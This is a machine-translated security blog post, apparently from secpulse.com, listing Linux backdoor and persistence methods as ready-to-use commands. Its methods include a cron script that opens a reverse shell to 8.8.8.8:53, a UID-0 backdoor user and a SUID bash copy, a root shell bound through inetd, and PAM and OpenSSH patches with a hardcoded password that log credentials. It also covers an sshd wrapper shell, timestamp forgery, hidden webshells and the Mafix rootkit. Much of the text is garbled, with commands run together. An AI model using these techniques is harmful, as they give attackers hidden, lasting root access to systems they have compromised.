I'm thinking about getting in touch .... It is forbidden to reprint ....
Brief introduction
Use Unix/linux's own Bash and Crond to achieve remote control, and keep bouncing off-line to the public network machine.
Utilization method
Create a/etc/xxxx script file (first name yourself) and use the script to bounce back. The following script represents a fully automatic bounce to the 8.8.8.8 53 port.
Nano/etc/xxxx
#!/bin/bashif netstat-ano|grep-v grep | grep "8.8.8.8" >/dev/nullthenecho "OK" >/dev/nullelse/sbin/iptables--policy INPUT accept/sbin/iptables--policy OUTPUT acceptbash-i >&/dev/tcp/8.8.8.8/53 0>&1fi
chmod +sx/etc/xxxx
Then we need to modify the/etc/crontab so that it executes periodically.
Nano/etc/crontab Add this line at the end of the/etc/crontab file. The delegate executes every 1 minutes.
*/1 * * * * root/etc/xxxx
Finally restart the Crond service. (different version of the restart mode, self-query)
Service Cron Reload
Service Cron Start
You can then use NC to receive the Shell on the 8.8.8.8 server.
NC-VV-LP 53
Linux/unix hidden files and folders
Linux/unix want to hide Webshell or back door or something, you can use the hidden folders and files.
Method One
For example, create a name at the beginning of the band. Webshell or folders, by default, will not be displayed, the browser when access to add a few access to the line. (View method:ls-a)
Touch. webshell.php create a file named. webshell.php
mkdir. backdoor/create a folder named. Backdoor
The ultimate approach
In the case of the administrator drinking too much or brain can not turn around, is absolutely not found! At least it took me so long to find a few.
Is the file words browser access directly to lose ... On the line, the catalogue is the same.
Touch ... Create a name for ... of the file
Mkdir... Create a name for ... The folder
Effect
This article "Linux Backdoor finishing collection (pulse recommended)" by the ARMYZER0 team original submission Security pulse, the author of the old driver, the security pulse secpulse.com exclusive published this article, if necessary reprint, please contact the security pulse authorization, unauthorized do not reprint.
Linux/unix Adding a user with a UID of 0
Brief introduction
Under the Unix system, the UID is 0, which is the root privilege. So when infiltration can add a UID of 0 users as the backdoor.
Use Method
Useradd-o-U 0 Backdoor
Linux/unix modifying file timestamps
Brief introduction
Unix under the hidden back door must be modified time, otherwise it is easy to be found, directly using touch .
For example, referring to the time of index.php, and then to webshell.php, the result of two files is the same time.
Use Method
Touch-r index.php webshell.php
or modify the timestamp directly to a certain day of the year. January 02, 2014 below.
Touch-t 1401021042.30 webshell.php
System environment:
dawg:~# uname-a
Linux Dawg 2.4.20-1-386 #3 Sat Mar 12:11:40 EST 2003 i686 Gnu/linux
SUID Shell
Use Method
First, switch to the root user and execute the following command:
dawg:~# Cp/bin/bash/.woot
dawg:~# chmod 4755/.woot
dawg:~# Ls-al/.woot
-rwsr-xr-x 1 root root 690668 Jul 17:14/.woot
Of course, you can also play other more hidden names, I think the wretched and witty you, will certainly come up with a lot of good names.
The point in front of the file is not necessary, just to hide the file (at the top of the file name, add ".", you can hide it in any file directory).
Now, as an ordinary user, let's enable this backdoor:
[Email protected]:~$ ID
uid=1000 (FW) gid=1000 (FW) groups=1000 (FW)
[Email protected]:~$/.woot.woot-2.05b$ ID
uid=1000 (FW) gid=1000 (FW) groups=1000 (FW). woot-2.05b$
Why not?
Because BASH2 has some security measures against suid. But this is not an inalienable:
. woot-2.05b$/.woot-p
. woot-2.05b# ID
uid=1000 (FW) gid=1000 (fw) Euid=0 (Root) groups=1000 (FW)
Use the-p parameter to get a root shell. This euid means that the effective user ID
It is important to note that when executing this suid shell as a normal user, you must use the full path.
Small knowledge:
How to find those files that have suid:
dawg:~# Find/-perm +4000-ls
This will return the file with the SUID bit.
Remote Backdoor
Utilization method
We use VI to modify the/etc/inetd.conf file
Original file:
#chargen dgram udp wait root internal#discard stream TCP nowait root internal#discard dgram udp wait root internal#daytime Stream TCP nowait root internal
Modified to:
#discard stream TCP nowait root internal#discard dgram udp wait root internaldaytime stream TCP nowait Root/bin/bash bash -I.
Open inetd:
dawg:~# inetd
If you want to force a restart of inetd:
dawg:~# Ps-ef | grep inetdroot 362 1 0 Jul22? 00:00:00/usr/sbin/inetdroot 13769 13643 0 17:51 pts/1 00:00:00 grep inetddawg:~# kill-hup 362
Now we can use NC to burst the chrysanthemum:
C:tools 192.168.1.77:inverse Host Lookup Failed:h_errno 11004:no_data (UNKNOWN) [192.168.1.77] (Daytime) Openbash:no Job control in this shellbash-2.05b# bash-2.05b#bash-2.05b# iduid=0 (root) gid=0 (root) groups=0 (root) bash-2.05b# uname- Alinux Dawg 2.4.20-1-386 #3 Sat April 12:11:40 EST 2003 i686 Gnu/linux
You can modify the/etc/services file by adding the following items:
Woot 6666/tcp #evil Backdoor Service
Then modify the/etc/inetd.conf:
Woot stream TCP nowait Root/bin/bash bash-i
We can modify it into some common ports to achieve the hidden.
Pam back Door
Brief introduction
PAM (pluggable authenticationmodules) is a certification mechanism presented by Sun.
It separates the services provided by the system and the authentication of the service by providing some dynamic link libraries and a unified set of APIs, allowing system administrators the flexibility to configure different authentication methods for different services as needed without changing the service program, while also facilitating the addition of new authentication methods to the system.
Pam was originally integrated in Solaris and has now been ported to other systems such as Linux, SunOS, hp-ux9.0, and so on.
The main idea of building Pam back door: pam_unix_auth.c patch installation to the normal Pam module.
Utilization method
1. Get the PAM version used by the target system:
RPM-QA |grep Pam
2. Compile and install Pam
3, the local pam_unix_auth.c file by patching the way, compile and build.
4, compiled after the file in: modules/pam_unix/.libs/pam_unix.so, backdoor password for root123, and will log the root password in/tmp/pslog.
Characteristics:
Advantages: Strong concealment, not easy to be found.
Disadvantage: Need to compile the environment, lack of GCC or other dependent packages prone to problems
OpenSSH back Door
Brief introduction
Download the new version of OpenSSH and download the corresponding patch package, this patch file contains the Sshbd5.9p1.diff file as a backdoor file,
Documents include: AUTH.C, AUTH-PAM.C, AUTH-PASSWD.C, canohost.c, Includes.h, log.c, SERVCONF.C, sshconnect2.c, SSHLOGIN.C, Version.h
Use Method
#tar-ZXVF openssh-5.9p1.tar.gz
#tar-ZXVF 0x06-openssh-5.9p1.patch.tar.gz
Vim Includes.h//Modify backdoor password, record file location,
/*
#define ILOG "/tmp/ilog"//Record the user name and password to log on to the computer
#define OLOG "/tmp/olog"//log machine login to the remote username and password
#define SECRETPW "root123"//password for your back door
*/
Characteristics:
Advantages: Strong concealment, not easy to be found.
Disadvantage: Need to compile the environment, lack of GCC or other dependent packages prone to problems.
quick access to SSH backdoor
Brief introduction
Executes the command will derive a 31337 port, then connects 31337, uses the root/bin/ftp/mail when the user name, the password is arbitrary, may log in.
Use Method
Execute on the remote host:
#ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oport=31337;
Will derive a 31337 port, and then connect 31337, with Root/bin/ftp/mail when the user name, password arbitrary, you can login.
Characteristics:
Advantage: Weak concealment, suitable for short time connection.
Disadvantage: After reboot, it will be disconnected, unable to rebound after the connection.
SSH Wrapper Backdoor
Brief introduction
Init starts with/USR/SBIN/SSHD, the script executes to getpeername here, the regular match will fail, so execute the next sentence, start the/usr/bin/sshd, this is the original sshd.
After the original SSHD listener port establishes a TCP connection, it will fork a sub-process to handle the specific work. This sub-process, there is no test, but the direct execution of the system default location of the/usr/sbin/sshd, this way of control back to the script.
At this point the child process standard input output has been redirected to the socket, getpeername can really get to the client TCP source port, if it is 19526 to execute sh to a shell.
Use Method
Client:
[Email protected] ~]# Cd/usr/sbin
[Email protected] sbin]# mv sshd. /bin
[Email protected] sbin]# echo ' #!/usr/bin/perl ' >sshd
[[email protected] sbin]# echo ' exec '/bin/sh ' if (getpeername (STDIN) =~/^ ... 4a/); ' >>sshd
[Email protected] sbin]# echo ' exec{"/usr/bin/sshd"} "/usr/sbin/sshd", @ARGV, ' >>sshd
[Email protected] sbin]# chmod u+x sshd
[Email protected] sbin]#/etc/init.d/sshd restart
Control side:
Socat stdiotcp4:target_ip:22,sourceport=19526
Characteristics:
Advantages: Strong concealment, no need to compile, for most of the environment.
Disadvantage: The sshd process needs to be restarted.
mafix rootkit Create Backdoor
Brief introduction
Mafix is a commonly used lightweight application level rootkits, which is characterized by a simple configuration and customizable authentication password and port number for remote login by forging an SSH protocol vulnerability.
Use Method
Once the installation is complete, you can log in remotely using the port configured by the SSH user @ip-p.
Characteristics:
Advantages: Hidden in general, no need to compile.
Disadvantage: will replace LS and other commands, easy to be detected
This article "Linux Backdoor finishing collection (pulse recommended)" by the ARMYZER0 team original submission Security pulse, the author of the old driver, the security pulse secpulse.com exclusive published this article, if necessary reprint, please contact the security pulse authorization, unauthorized do not reprint.
Reproduced Linux Backdoor finishing collection (pulse recommended)